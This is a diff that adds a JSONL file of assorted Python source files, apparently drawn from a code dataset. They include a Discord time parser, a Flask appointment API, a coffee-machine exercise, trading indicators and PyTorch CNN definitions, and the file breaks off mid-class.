diff --git "a/6339.jsonl" "b/6339.jsonl" new file mode 100644--- /dev/null +++ "b/6339.jsonl" @@ -0,0 +1,738 @@ +{"seq_id":"466999256","text":"import re\nfrom datetime import datetime\nfrom dateutil import tz\n\nvalidLanguages = [\"jp\", \"en\"]\n\nclass UserMeetTime:\n def __init__(self, userInput):\n self.user = userInput.author.mention\n self.isValidInput = True\n self.languageSelected = \"\"\n self.startTime = datetime.now()\n self.endTime = datetime.now()\n self.timezone = \"\"\n self.isMatched = False\n\n\n content = re.split(' ', userInput.content)\n self.checkString(content)\n\n # Refactor this to be more manageable\n def checkString(self, inputStringArray):\n if inputStringArray[1] in validLanguages:\n self.languageSelected = inputStringArray[1]\n else:\n self.isValidInput = False\n\n try:\n print(\"input array 2\" + inputStringArray[2])\n date = inputStringArray[2].replace('/', '/')\n\n baseTime = datetime.strptime(date, '%m/%d')\n\n baseTime = baseTime.replace(year=datetime.now().year)\n\n inputStringArray[3].replace('ー', '-')\n\n times = inputStringArray[3].split('-')\n\n self.startTime = self.generateTimeAttribute(times[0], baseTime)\n self.endTime = self.generateTimeAttribute(times[1], baseTime)\n\n # Need to fix this, timezones require a specific location for tz module\n self.timezone = inputStringArray[4]\n # self.timezone = tz.gettz(inputStringArray[4])\n # self.desiredTime.astimezone(self.timezone)\n except TypeError:\n self.isValidInput = False\n\n def generateTimeAttribute(self, timeStr, dateToReplaceWith):\n timeStr.replace(':', ':')\n\n tmpTime = datetime.strptime(timeStr, \"%H:%M\")\n\n return tmpTime.replace(year=dateToReplaceWith.year, month=dateToReplaceWith.month, day=dateToReplaceWith.day)\n","sub_path":"UserMeetTimeClass.py","file_name":"UserMeetTimeClass.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"408604471","text":"import IDLC.idltypes as IDLTypes\nimport genutil as util\n\ndef Capitalize(s):\n return s[:1].upper() + s[1:]\n\ndef GetTypeCamelNotation(attributeName, attribute, document):\n if not \"type\" in attribute:\n util.fmtError('Attribute type is required. Attribute \"{}\" does not name a type!'.format(attributeName))\n typeString = IDLTypes.ConvertToCamelNotation(attribute[\"type\"])\n\n if not typeString:\n # Figure out what type it actually is.\n if attribute[\"type\"] in document[\"enums\"]:\n typeString = IDLTypes.ConvertToCamelNotation(\"uint\") # type for enums is uint\n else:\n util.fmtError('\"{}\" is not a valid type!'.format(attribute[\"type\"]))\n return typeString\n\n#------------------------------------------------------------------------------\n##\n#\ndef WriteAttributeHeaderDeclarations(f, document):\n for attributeName, attribute in document[\"attributes\"].items():\n typeString = IDLTypes.GetTypeString(attribute[\"type\"])\n\n if not \"fourcc\" in attribute:\n util.fmtError('Attribute FourCC is required. 
Attribute \"{}\" does not have a fourcc!'.format(attributeName))\n fourcc = attribute[\"fourcc\"]\n\n accessMode = \"rw\"\n if \"access\" in attribute:\n accessMode = IDLTypes.AccessModeToClassString(attribute[\"access\"])\n \n defVal = IDLTypes.DefaultValue(attribute[\"type\"])\n if \"default\" in attribute:\n default = IDLTypes.DefaultToString(attribute[\"default\"])\n defVal = \"{}({})\".format(IDLTypes.GetTypeString(attribute[\"type\"]), default)\n\n f.WriteLine('__DeclareAttribute({}, {}, \\'{}\\', {}, {});'.format(Capitalize(attributeName), typeString, fourcc, accessMode, defVal))\n\n#------------------------------------------------------------------------------\n##\n#\ndef WriteAttributeSourceDefinitions(f, document):\n for attributeName, attribute in document[\"attributes\"].items():\n typeString = IDLTypes.GetTypeString(attribute[\"type\"])\n\n if not \"fourcc\" in attribute:\n util.fmtError('Attribute FourCC is required. Attribute \"{}\" does not have a fourcc!'.format(attributeName))\n fourcc = attribute[\"fourcc\"]\n\n accessMode = \"rw\"\n if \"access\" in attribute:\n accessMode = IDLTypes.AccessModeToClassString(attribute[\"access\"])\n \n defVal = IDLTypes.DefaultValue(attribute[\"type\"])\n if \"default\" in attribute:\n default = IDLTypes.DefaultToString(attribute[\"default\"])\n defVal = \"{}({})\".format(IDLTypes.GetTypeString(attribute[\"type\"]), default)\n\n f.WriteLine('__DefineAttribute({}, {}, \\'{}\\', {}, {});'.format(Capitalize(attributeName), typeString, fourcc, accessMode, defVal))\n\n#------------------------------------------------------------------------------\n##\n#\ndef WriteEnumeratedTypes(f, document):\n if \"enums\" in document:\n for enumName, enum in document[\"enums\"].items():\n # Declare Enums\n f.InsertNebulaDivider()\n f.WriteLine(\"enum {}\".format(enumName))\n f.WriteLine(\"{\")\n f.IncreaseIndent()\n numValues = 0\n for key, value in enum.items():\n f.WriteLine(\"{} = {},\".format(key, value))\n numValues += 1\n f.WriteLine(\"Num{} = {}\".format(Capitalize(enumName), numValues))\n f.DecreaseIndent()\n f.WriteLine(\"};\")\n f.WriteLine(\"\")","sub_path":"fips-files/generators/IDLC/idlattribute.py","file_name":"idlattribute.py","file_ext":"py","file_size_in_byte":3435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"601319522","text":"from ..models import User, AppointmentEvents, Device, user_device\nfrom .. import db\nfrom . 
import api\nfrom flask import request, jsonify\nfrom datetime import datetime\nfrom sqlalchemy import and_\nimport re\n\n\n@api.route('/v1.0/data/', methods=['POST'])\ndef return_data(device_id):\n if device_id is None:\n return \"No valid device ID\", 401\n device_id = int(device_id)\n r = (request.stream.read()).decode(\"utf-8\")\n r = re.findall(r'\\d*-\\d*-\\d*', r)\n start = datetime.strptime(r[0], '%Y-%m-%d')\n end = datetime.strptime(r[1], '%Y-%m-%d')\n events = AppointmentEvents.query.filter(\n and_(AppointmentEvents.device_id == device_id,\n AppointmentEvents.start.between(start, end))\n ).all()\n response = []\n for event in events:\n if not event.is_finished:\n response.append({\"title\": event.name + ' Event ID: ' + str(event.id) + ' Remark: ' + str(event.remark),\n \"start\": event.start,\n \"end\": event.end,\n \"id\": event.id})\n else:\n response.append({\"title\": event.name + ' Event ID: ' + str(event.id) + ' Remark: ' + str(event.remark),\n \"start\": event.start,\n \"end\": event.end,\n \"id\": event.id,\n \"color\": 'black',\n \"textColor\": 'white'})\n return jsonify(response), 200\n\n\n@api.route('/v1.0/add//', methods=['POST'])\ndef add_data(token, device_id):\n if token is None:\n return \"No valid token\", 401\n if device_id is None:\n return \"No valid device ID\", 401\n user = User.query.filter_by(avatar_hash=token).first_or_404()\n # devices = user.devices.all()\n device_id = int(device_id)\n # not available?\n # ud = user_device.query.join(User, Device).filter(User.id == user.id,\n # Device.id == device_id).first()\n # if device_id not in devices:\n # if ud is None:\n device = Device.query.filter_by(id=device_id).first_or_404()\n if user not in device.users:\n return \"No permission to access {0}\".format(device_id), 401\n r = request.get_json(force=True)\n\n if r['title'] == '' or r['remark'] == '' or r['start'] == '' or r['end'] == '':\n return jsonify({\"blocked\": 2})\n\n start_date = datetime.strptime(r['start'], '%Y-%m-%dT%H:%M:%S.%fZ')\n end_date = datetime.strptime(r['end'], '%Y-%m-%dT%H:%M:%S.%fZ')\n title = r['title']\n remark = r['remark']\n # print(start_date.time())\n # print(type(title))\n # print(title == '')\n events = AppointmentEvents.query.filter(\n and_(AppointmentEvents.device_id == device_id,\n AppointmentEvents.start.between(start_date, end_date))\n ).all()\n\n if len(events) == 0:\n event_new = AppointmentEvents(name=title, user_id=user.id, device_id=device_id, start=start_date, end=end_date,\n remark=remark)\n db.session.add(event_new)\n db.session.commit()\n else:\n for event in events:\n if not event.is_finished:\n return jsonify({\"blocked\": 3})\n else:\n continue\n\n event_new = AppointmentEvents(name=title, user_id=user.id, device_id=device_id, start=start_date, end=end_date,\n remark=remark)\n db.session.add(event_new)\n db.session.commit()\n\n return jsonify({\"blocked\": 0, \"id\": event_new.id}), 200\n\n\n@api.route('/v1.0/remove//', methods=['POST'])\ndef remove_data(token, device_id):\n if token is None:\n return \"No valid token\", 401\n if device_id is None:\n return \"No valid device ID\", 401\n user = User.query.filter_by(avatar_hash=token).first()\n # privilege = list(map(int, user.privilege.split(',')))\n device_id = int(device_id)\n device = Device.query.filter_by(id=device_id).first_or_404()\n if user not in device.users:\n return \"No permission to access {0}\".format(device_id), 401\n r = request.get_json(force=True)\n event_id = r['event_id']\n event = 
AppointmentEvents.query.filter_by(id=event_id).first_or_404()\n if user.id == event.user_id and not event.is_finished:\n db.session.delete(event)\n db.session.commit()\n return jsonify({\"id\": event.id}), 200\n elif user.id != event.user_id:\n return \"No permission to access this event\", 401\n else:\n return \"You can Not remove a complete event\", 401\n","sub_path":"test_device_appointment_system/app/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"368265585","text":"# coding=utf-8\n\nimport pandas as pd\nfrom sinagot.models import Model, Step\nfrom sinagot.utils import LOG_STEP_LABEL, LOG_STEP_STATUS\n\n\nclass StepCollection(Model):\n \"\"\"Manage all steps of a category.\n\n Args:\n model (instance): Parent model of the collection.\n\n Attributes:\n model (instance): Parent model of the collection.\n\n \"\"\"\n\n _MODEL_TYPE = \"step_collection\"\n\n def __init__(self, model):\n\n super().__init__(model.dataset)\n self.model = model\n self.task = self.model.task\n self.modality = self.model.modality\n\n @property\n def _scripts_names(self):\n try:\n sn = self.dataset.config[\"modalities\"][self.modality][\"scripts\"]\n except KeyError:\n return []\n try:\n return (\n sn\n + self.dataset.config[\"modalities\"][self.modality][\"tasks_scripts\"][\n self.task\n ]\n )\n except KeyError:\n return sn\n\n def get_script(self, script_name):\n return self._get_module(\"Script\", self.modality, script_name)\n\n def get(self, script):\n\n return Step(script=script, model=self.model)\n\n def all(self):\n for script_name in self._scripts_names:\n yield self.get(script_name)\n\n def find(self, pattern):\n\n for script_name in self._scripts_names:\n if pattern in script_name:\n yield self.get(script_name)\n\n def first(self):\n \"\"\"Get the first step.\n\n Returns:\n instance: Step instance\n \"\"\"\n\n return self.get(self._scripts_names[0])\n\n def count(self):\n return len(self._scripts_names)\n\n def status(self):\n if self.model._MODEL_TYPE == \"record\":\n if self.count() > 0:\n return pd.DataFrame(\n [\n {\n \"record_id\": self.model.id,\n \"task\": self.task,\n \"modality\": self.modality,\n \"step_index\": index,\n LOG_STEP_LABEL: step.label,\n LOG_STEP_STATUS: step.status(),\n }\n for index, step in zip(range(1, self.count() + 1), self.all())\n ]\n )\n else:\n return None\n elif self.model.count() == 0:\n return None\n else:\n return pd.concat(\n [rec.status() for rec in self.model.all() if rec.status() is not None]\n )\n","sub_path":"sinagot/models/step_collection.py","file_name":"step_collection.py","file_ext":"py","file_size_in_byte":2611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"14275821","text":"import data\r\n\r\nmachine_state = True\r\nuser_flavor = input(\"What would you like? 
(espresso/latte/cappuccino): \").lower()\r\nquarters = 0.25\r\ndimes = 0.10\r\nnickles = 0.05\r\npennies = 0.01\r\nmoney = {\r\n 'money': 0.0\r\n}\r\nwhile machine_state:\r\n def resources():\r\n \"\"\"This function is show the machine resources\"\"\"\r\n print(\"Resources: \")\r\n for i in data.resources:\r\n print(f\" {i}: {data.resources[i]}\")\r\n\r\n\r\n def compare(comp):\r\n \"\"\" This function is return whether the condition is true or not \"\"\"\r\n if comp == 'espresso':\r\n if data.MENU[comp]['ingredients']['water'] <= data.resources['water'] and data.MENU[comp]['ingredients'][\r\n 'coffee'] <= data.resources['coffee']:\r\n return True\r\n else:\r\n report_input = input(\"Can't proceed. Do you want to see the resource 'yes' to view? \").lower\r\n if report_input == 'yes':\r\n resources()\r\n print(\"I don't have a that much of resources.\")\r\n return False\r\n\r\n else:\r\n if data.MENU[comp]['ingredients']['water'] <= data.resources['water'] and data.MENU[comp]['ingredients'][\r\n 'milk'] <= data.resources['milk'] and data.MENU[comp]['ingredients']['coffee'] <= data.resources[\r\n 'coffee']:\r\n return True\r\n else:\r\n report_input = input(\"Can't proceed. Do you want to see the resource 'yes' to view\").lower\r\n if report_input == 'yes':\r\n resources()\r\n print(\"I don't have a that much of resources.\")\r\n return False\r\n\r\n\r\n def flavors(flavor):\r\n \"\"\"\"This function take a flavor as a input\"\"\"\r\n if compare(flavor):\r\n resources()\r\n print(f\" Money: {money['money']}\")\r\n print(f\"The total cost around : {data.MENU[flavor]['cost']}\")\r\n us_quarters = int(input(\"quarters: \"))\r\n us_dimes = int(input(\"dimes: \"))\r\n us_nickles = int(input(\"nickles: \"))\r\n us_pennies = int(input(\"pennies: \"))\r\n user_answer = (quarters * us_quarters) + (dimes * us_dimes) + (nickles * us_nickles) + (\r\n pennies * us_pennies)\r\n if data.MENU[flavor]['cost'] <= user_answer:\r\n if data.MENU[flavor]['cost'] < user_answer:\r\n extra_money = float(user_answer - data.MENU[flavor]['cost'])\r\n print(f\"Here is your {extra_money} dollars in change\")\r\n if flavor == 'espresso':\r\n data.resources['water'] = data.resources['water'] - data.MENU[flavor]['ingredients']['water']\r\n data.resources['coffee'] = data.resources['coffee'] - data.MENU[flavor]['ingredients']['coffee']\r\n money['money'] += data.MENU[flavor]['cost']\r\n print(\"process complete.............. Enjoy your coffee ...\")\r\n resources()\r\n print(f\" Money: {money['money']}\")\r\n make_coffee_again = input(\"Do you want to make another coffeee? type 'yes' to make or 'off' to \"\r\n \"off the coffee machine: \").lower()\r\n if make_coffee_again == 'yes':\r\n new_input = input(\"What would you like? (espresso/latte/cappuccino): \").lower()\r\n flavors(new_input)\r\n if make_coffee_again == 'off':\r\n print(\"machine off...\")\r\n global machine_state\r\n machine_state = False\r\n else:\r\n data.resources['water'] = data.resources['water'] - data.MENU[flavor]['ingredients']['water']\r\n data.resources['milk'] = data.resources['milk'] - data.MENU[flavor]['ingredients']['milk']\r\n data.resources['coffee'] = data.resources['coffee'] - data.MENU[flavor]['ingredients']['coffee']\r\n money['money'] += data.MENU[flavor]['cost']\r\n print(\"process complete.............. Enjoy your coffee ...\")\r\n resources()\r\n print(f\" Money: {money['money']}\")\r\n make_coffee_again = input(\"Do you want to make another coffeee? 
type 'yes' to make or 'off' to \"\r\n \"off the coffee machine: \")\r\n if make_coffee_again == 'yes':\r\n new_input = input(\"What would you like? (espresso/latte/cappuccino): \").lower()\r\n flavors(new_input)\r\n elif make_coffee_again == 'off':\r\n print(\"machine off...\")\r\n machine_state = False\r\n else:\r\n print(\"sorry that's not enough money . Money refunded .\")\r\n print(\"machine off...\")\r\n machine_state = False\r\n\r\n\r\n flavors(user_flavor)","sub_path":"Coffee_machine/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"254633357","text":"# Ejercicio 2.11: Escribir un programa que pida al usuario un número entero y muestre por pantalla si es par o\n# impar.\n\n\nclass Numbers:\n '''\n Recibe el numero del terminal y verifica que el input sea un numero\n y no un string\n '''\n def __init__(self):\n self.number = 0\n \n def get_input(self):\n valid = False\n while not valid:\n try:\n inp = input(\"Ingrese un numero: \")\n self.number = int(inp)\n valid = True\n except ValueError:\n print(\"Las letras no son numeros :/ Por favor escriba un numero\")\n\n def check_odd_even(self):\n '''\n Revisa si el numero ingresado en el terminal es positivo o negativo y par o \n impar, e imprime el resultado de la verificacion\n '''\n self.get_input()\n if self.number > 0:\n if self.number % 2 == 0:\n print(f\"El numero {self.number} es un numero par y positivo\")\n else:\n print(f\"El numero {self.number} es un numero impar y positivo\")\n if self.number < 0:\n if self.number % 2 == 0:\n print(f\"El numero {self.number} es un numero par y negativo\")\n else:\n print(f\"El numero {self.number} es un numero impar y negativo\")\n if self.number == 0:\n print(f\"El numero {self.number} es tecnicamente considerado par\")\n\ndata = Numbers().check_odd_even()","sub_path":"prepas_ejercicios/2_semana/prepa2.11.py","file_name":"prepa2.11.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"162642930","text":"# coding=utf-8\n\"\"\"\nCreated by Jayden.jeon @ Dunamu datavalue lab\n\n다음 스크립트에서 포함하고 있는 기술적 지표는 다음과 같다.\n\n대부분의 계산에서 평균을 계산할때 사용하는 period-length 는 변수로 남겨두었다.\n(default setting 의 경우 trading view 의 세팅과 동일하게 해놓음)\n\n\n########################################################\n########################################################\n########################################################\nStochastic Oscillator :\n\nreference\nhttps://www.investopedia.com/terms/s/stochasticoscillator.asp#:~:text=A%20stochastic%20oscillator%20is%20a,moving%20average%20of%20the%20result.\n\n스토캐스틱 지표\n\ninput\nclosing_price (list): 종가의 리스트\nK (int): Slow stochastic 추출 파라미터\nD (int): Fast stochastic 추출 파라미터\n\noutput\n\ndictionary\n{\n 'l_k': K 기간동안의 최저가\n 'h_k': K 기간동안의 최고가\n 'per_k': Stochastic indicator (slow)\n 'per_d': Stochastic indicator (fast)\n}\n\n########################################################\n########################################################\n########################################################\nRSI :\n\nreference : https://www.macroption.com/rsi-calculation/\n\nα = 1 / N\nand therefore 1 – α = ( N – 1 ) / N\nwhere, N = RSI period\n\nFor example, if N is 14, RSI formula for average up move is:\nAvgUt = 1/14 * Ut + 13/14 * AvgUt-1\n\n\ninput\nclosing_price (list): 종가의 리스트\nn (int): RSI period\navg_method (function): 평균 계산 법\n\noutput\n\ndictionary\n{\n 'avg_u': 
평균 상승\n 'avg_d': 평균 하락\n 'rsi': rsi value\n}\n\n\n\n########################################################\n########################################################\n########################################################\nMACD :\n\nreference : https://www.investopedia.com/terms/m/macd.asp\n\nMACD 계산법 : ema_fast_row - ema_slow_row\nsignal 계산법 : macd_row 의 ema\n\ninput\nclosing_price (list): 종가의 리스트\nfast (int): fast_ema period\nslow (int): slow_ema period\nsignal (int): signal_ema period\n\noutput\n\ndictionary\n{\n 'ema_fast': ema_fast_row,\n 'ema_slow': ema_slow_row,\n 'macd': macd_row,\n 'signal': signal_row\n}\n\n\n########################################################\n########################################################\n########################################################\nmoving average :\n\nreference : https://www.investopedia.com/terms/m/macd.asp\n\nMACD 계산법 : ema_fast_row - ema_slow_row\nsignal 계산법 : macd_row 의 ema\n\ninput\nprice_row (list): 가격의 리스트\nn (int): period\n\noutput\naverage_row (list) : 평균가격 리스트\n\n\n########################################################\n########################################################\n########################################################\ndmi (Directional Movement Index) :\n\nreference :\nhttps://coolbingle.blogspot.com/2019/03/using-spreadsheet-to-produce-dmi.html\nhttps://www.fidelity.com/learning-center/trading-investing/technical-analysis/technical-indicator-guide/dmi\n\n\ninput\nprice_open (list): 시가 리스트\nprice_high (list): 고가 리스트\nprice_low (list): 저가 리스트\nprice_close (list): 종가 리스트\nn (int): di_length parameter\nm (int): adx_smoothing parameter\n\noutput\ndictionary\n{\n 'di_plus': di_p_row,\n 'di_minus': di_m_row,\n 'avg_dx': avg_dx_row\n}\n\n\n########################################################\n########################################################\n########################################################\nBollinger (Bollinger band) :\n\nreference :\nhttps://www.investopedia.com/terms/b/bollingerbands.asp\n\ninput\nprice_row (list): 가격 리스트\nlength (int): used to calculate ma\nstdev (int): bollinger band range\n\noutput\ndictionary\n{\n 'b_upper': bollinger_upper,\n 'b_middle': moving_average,\n 'b_lower': bollinger_lower,\n}\n\n\"\"\"\n\nimport numpy as np\nfrom . import zigzag\nfrom . 
import strategy\n\nclass Helper:\n def __init__(self):\n return\n\n # simple moving average\n @staticmethod\n def sma(row, n):\n if len(row) == 0: return 0\n return np.sum(row) / n\n\n # exponential moving average\n @staticmethod\n def ema(prev_avg, incoming_val, n):\n alpha = 2 / (n + 1)\n return_val = alpha * incoming_val + (1 - alpha) * prev_avg\n return return_val\n\n @staticmethod\n def get_ema_row(row, n):\n ema_row = []\n for i, val in enumerate(row):\n if i < n - 1:\n ema_row.append(-1)\n elif i == n - 1:\n input_row = row[i - n + 1:i + 1]\n ema_row.append(np.average(input_row))\n\n else:\n ema_val = Helper.ema(ema_row[-1], val, n)\n ema_row.append(ema_val)\n\n return ema_row\n\n\n # wilder's smoothing method\n @staticmethod\n def wilder(row, n):\n avg_t = 0\n if len(row) == 0: return 0\n alpha = 1 / n\n for i, value in enumerate(row):\n if i == 0:\n avg_t = value\n else:\n avg_t = alpha * value + (1 - alpha) * avg_t\n return avg_t\n\n\n\n\n\nclass Indicator:\n def __init__(self):\n return\n\n @staticmethod\n def stochastic_oscillator(closing_price, k=14, d=3):\n # 가장 최근의(마지막 trade_price)\n l_k = []\n h_k = []\n per_k = []\n per_d = []\n for i, val in enumerate(closing_price):\n if i < k - 1:\n l_k.append(0)\n h_k.append(0)\n per_k.append(0)\n else:\n l_val = np.min(closing_price[i - k + 1:i + 1])\n h_val = np.max(closing_price[i - k + 1:i + 1])\n l_k.append(l_val)\n h_k.append(h_val)\n per_k_val = 100 * (val - l_val) / (h_val - l_val)\n per_k.append(per_k_val)\n\n for i, val in enumerate(per_k):\n if i < k + d - 1:\n per_d.append(0)\n else:\n per_d.append(np.average(per_k[i - d:i + 1]))\n return {\n 'l_k': l_k,\n 'h_k': h_k,\n 'per_k': per_k,\n 'per_d': per_d,\n }\n\n\n @staticmethod\n def rsi(closing_price, n=14, avg_method=Helper.sma):\n # rsi step1\n # 100 - (100/1+ avg_gain/avg_loss)\n # get n days info\n date_val = closing_price[1:].values\n pre_date_val = closing_price[:-1].values\n change_row = np.append(0, date_val - pre_date_val)\n\n avg_u = []\n avg_d = []\n rsi_row = []\n\n for i, val in enumerate(closing_price):\n if i < n - 1:\n avg_u.append(0)\n avg_d.append(0)\n rsi_row.append(0)\n else:\n temp_row = change_row[i - n:i + 1]\n u_row = temp_row[temp_row >= 0]\n d_row = np.abs(temp_row[temp_row < 0])\n avg_u_val = avg_method(u_row, n)\n avg_d_val = avg_method(d_row, n)\n if avg_d_val == 0:\n rsi = 1\n else:\n rs = avg_u_val / avg_d_val\n rsi = 100 * (1 - 1 / (1 + rs))\n avg_u.append(avg_u_val)\n avg_d.append(avg_d_val)\n rsi_row.append(rsi)\n\n return {\n 'avg_u': avg_u,\n 'avg_d': avg_d,\n 'rsi': rsi_row\n }\n\n\n\n @staticmethod\n def macd(closing_price, fast=12, slow=26, sig=9):\n if slow <= fast:\n print('ERRRR')\n return None\n ema_fast_row = np.array(Helper.get_ema_row(closing_price, fast))\n ema_slow_row = np.array(Helper.get_ema_row(closing_price, slow))\n macd_row = ema_fast_row - ema_slow_row\n macd_row[:slow] = 0\n signal_row = np.array(Helper.get_ema_row(macd_row, sig))\n\n return {\n 'ema_fast': ema_fast_row,\n 'ema_slow': ema_slow_row,\n 'macd': macd_row,\n 'signal': signal_row\n }\n\n\n\n @staticmethod\n def moving_average(price_row, n):\n average_row = []\n for i, value in enumerate(price_row):\n if i < n - 1:\n average_row.append(0)\n else:\n input_row = price_row[i - n + 1:i + 1]\n average_row.append(np.average(input_row))\n return average_row\n\n\n @staticmethod\n def dmi(price_open, price_high, price_low, price_close, n=14, m=14):\n true_range_row = []\n dm_plus_row = []\n dm_minus_row = []\n\n for i, val in enumerate(zip(price_open, price_high, 
price_low, price_close)):\n if i == 0:\n true_range_row.append(0)\n dm_plus_row.append(0)\n dm_minus_row.append(0)\n continue\n\n (o, h, l, c) = val\n prev_c = price_close[i - 1]\n prev_h = price_high[i - 1]\n prev_l = price_low[i - 1]\n\n candidate_1 = h - l\n candidate_2 = abs(h - prev_c)\n candidate_3 = abs(l - prev_c)\n\n true_range = max(candidate_1, candidate_2, candidate_3)\n\n if h - prev_h > prev_l - l:\n dm_plus0 = max(h - prev_h, 0)\n else:\n dm_plus0 = 0\n\n if prev_l - l > h - prev_h:\n dm_minus0 = max(prev_l - l, 0)\n else:\n dm_minus0 = 0\n\n if dm_plus0 > dm_minus0:\n dm_plus = dm_plus0\n dm_minus = 0\n\n elif dm_plus0 < dm_minus0:\n dm_minus = dm_minus0\n dm_plus = 0\n else:\n dm_minus, dm_plus = 0, 0\n\n true_range_row.append(true_range)\n dm_plus_row.append(dm_plus)\n dm_minus_row.append(dm_minus)\n\n avg_true_range_row = []\n avg_dm_plus_row = []\n avg_dm_minus_row = []\n\n di_p_row = []\n di_m_row = []\n dx_row = []\n\n for i, val in enumerate(zip(true_range_row, dm_plus_row, dm_minus_row)):\n (tr, dm_p, dm_m) = val\n\n if i < n - 1:\n avg_true_range_row.append(0)\n avg_dm_plus_row.append(0)\n avg_dm_minus_row.append(0)\n\n di_p_row.append(0)\n di_m_row.append(0)\n dx_row.append(0)\n continue\n\n elif i == n - 1:\n avg_tr = np.average(true_range_row[i - (n - 1):i + 1])\n avg_dm_p = np.average(dm_plus_row[i - (n - 1):i + 1])\n avg_dm_m = np.average(dm_minus_row[i - (n - 1):i + 1])\n\n else:\n avg_tr_p = avg_true_range_row[-1]\n avg_dm_p_p = avg_dm_plus_row[-1]\n avg_dm_m_p = avg_dm_minus_row[-1]\n\n avg_tr = avg_tr_p + (tr - avg_tr_p) / n\n avg_dm_p = avg_dm_p_p + (dm_p - avg_dm_p_p) / n\n avg_dm_m = avg_dm_m_p + (dm_m - avg_dm_m_p) / n\n\n\n di_p = avg_dm_p / avg_tr\n di_m = avg_dm_m / avg_tr\n dx = 100 * abs(avg_dm_p - avg_dm_m) / (avg_dm_p + avg_dm_m)\n\n di_p_row.append(di_p)\n di_m_row.append(di_m)\n dx_row.append(dx)\n\n avg_true_range_row.append(avg_tr)\n avg_dm_plus_row.append(avg_dm_p)\n avg_dm_minus_row.append(avg_dm_m)\n\n\n\n\n avg_dx_row = []\n\n for i, dx in enumerate(dx_row):\n if (dx == 0) or (i < m - 1):\n avg_dx_row.append(0)\n continue\n # 맨 처음 들어오는 value\n if avg_dx_row[-1] == 0:\n avg_dx_row.append(dx)\n\n else:\n adx_p = avg_dx_row[-1]\n adx = adx_p + (dx - adx_p) / m\n avg_dx_row.append(adx)\n\n return {\n 'di_plus': di_p_row,\n 'di_minus': di_m_row,\n 'avg_dx': avg_dx_row\n }\n\n\n @staticmethod\n def bollinger_band(price_row, length=20, stdev=2):\n average_row = []\n upper_row = []\n lower_row = []\n position_row = []\n\n for i, value in enumerate(price_row):\n if i < length - 1:\n average_row.append(0)\n upper_row.append(0)\n lower_row.append(0)\n position_row.append(0)\n else:\n input_row = price_row[i - length + 1:i + 1]\n average_row.append(np.average(input_row))\n stdev_val = np.std(input_row)\n upper_row.append(np.average(input_row)+stdev*stdev_val)\n lower_row.append(np.average(input_row)-stdev*stdev_val)\n # 현재 가격이 볼린저밴드에서 위치한 곳\n position = (value-np.average(input_row))/stdev_val\n position_row.append(position)\n\n return {\n 'b_upper': upper_row,\n 'b_middle': average_row,\n 'b_lower': lower_row,\n 'b_position': position_row\n }\n\n\n","sub_path":"external_lib/technical_indicators/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":13019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"584000442","text":"import numpy as np\n\n\ndef one_hot(y):\n \"\"\"\n Create a one hot matrix from a vector of values.\n\n :param y: a vector of integer values representing 
the index at which the value 1 is inserted .\n :return: a one hot matrix with n fields.\n \"\"\"\n n_values = np.max(y) + 1\n return np.eye(n_values)[y]\n\n\ndef batch_iterator(x, batch_size=64):\n \"\"\"\n Split data x into equal sized chunks.\n\n :param x: an iterable input.\n :param batch_size: the size to split a batch into.\n :return: yield iterable of size batch_size\n \"\"\"\n n_samples = x.shape[0]\n n_batches = n_samples // batch_size\n batch_end = 0\n\n for b in range(n_batches):\n batch_begin = b * batch_size # our beginning index for this batch\n batch_end = batch_begin + batch_size # our end index for this batch\n\n x_batch = x[batch_begin:batch_end]\n\n yield x_batch\n\n if n_batches * batch_size < n_samples:\n yield x[batch_end:]\n","sub_path":"mla/utils/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"457617983","text":"#net_model\nfrom torch import nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nimport torch\n\ndef conv3x3(in_channel, out_channel, stride=1):\n\t\treturn nn.Conv2d(in_channel, out_channel, 3, stride=stride, padding=1, bias=False)\n\n\t\t\nclass CNN2(nn.Module):\n def __init__(self):\n super(CNN2, self).__init__()\n self.conv1 = nn.Sequential(\n nn.Conv2d(\n in_channels=1,\n out_channels=16,\n kernel_size=5,\n stride=1,\n padding=2\n ),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=2))\n self.conv2 = nn.Sequential(\n nn.Conv2d(16, 32, 5, 1, 2), \n nn.ReLU(), \n nn.MaxPool2d(2))\n self.out = nn.Linear(32*7*7, 10)\n \n def forward(self, x):\n x = self.conv1(x)\n x = self.conv2(x)\n x = x.view(x.size(0), -1)\n output = self.out(x)#logit输出,如果loss函数为mse,则还要进行softmax\n return output#, x\n\t\t\n\n\t\t\nclass CNN(nn.Module):#这是mnist专用28*28\n\tdef __init__(self):\n\t\tsuper(CNN, self).__init__()\n\t\tself.conv1 = nn.Sequential( # input shape (1, 28, 28)\n\t\t\tnn.Conv2d(\n\t\t\t\tin_channels=1, # input height\n\t\t\t\tout_channels=32, # n_filters\n\t\t\t\tkernel_size=5, # filter size\n\t\t\t\tstride=1, # filter movement/step\n\t\t\t\tpadding=2, # if want same width and length of this image after Conv2d, padding=(kernel_size-1)/2 if stride=1\n\t\t\t), # output shape (16, 28, 28)\n\t\t\tnn.ReLU(), # activation\n\t\t\tnn.MaxPool2d(kernel_size=2), # choose max value in 2x2 area, output shape (16, 14, 14)\n\t\t\tnn.BatchNorm2d(32),\n\t\t)\n\t\tself.conv2 = nn.Sequential( # input shape (16, 14, 14)\n\t\t\tnn.Conv2d(32, 64, 5, 1, 2), # output shape (32, 14, 14)\n\t\t\tnn.ReLU(), # activation\n\t\t\tnn.MaxPool2d(2), # output shape (32, 7, 